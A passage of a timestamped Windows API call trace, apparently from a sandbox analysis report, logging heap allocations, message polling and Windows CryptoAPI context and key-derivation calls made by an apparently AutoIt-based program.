returned 0 [0263.878] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0263.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0263.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0263.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0263.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e699e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0263.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.879] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0263.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0263.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0263.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0263.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0263.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0263.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0263.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0263.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0263.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0263.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0263.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0263.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0263.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0263.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0263.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0263.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0263.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0263.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0263.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0263.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0263.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0263.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0263.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0263.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0263.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0263.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0263.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0263.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0263.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14038 | out: hHeap=0x970000) returned 1 [0263.886] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0263.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0263.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0263.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0263.886] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0263.886] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0263.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0263.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0263.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0263.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0263.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0263.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0263.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0263.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0263.887] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0263.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0263.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0263.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0263.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0263.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0263.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0263.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0263.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0263.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0263.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.889] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0263.889] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0263.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0263.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0263.890] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0263.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0263.890] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0263.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0263.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0263.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0263.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0263.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0263.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0263.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0263.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0263.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0263.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0263.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0263.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0263.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0263.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0263.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0263.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0263.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.893] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0263.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0263.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0263.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0263.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0263.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0263.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.893] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0263.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.893] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0263.894] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0263.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0263.894] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.894] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0263.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0263.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.894] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.894] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0263.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.894] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0263.895] PeekMessageW (in: 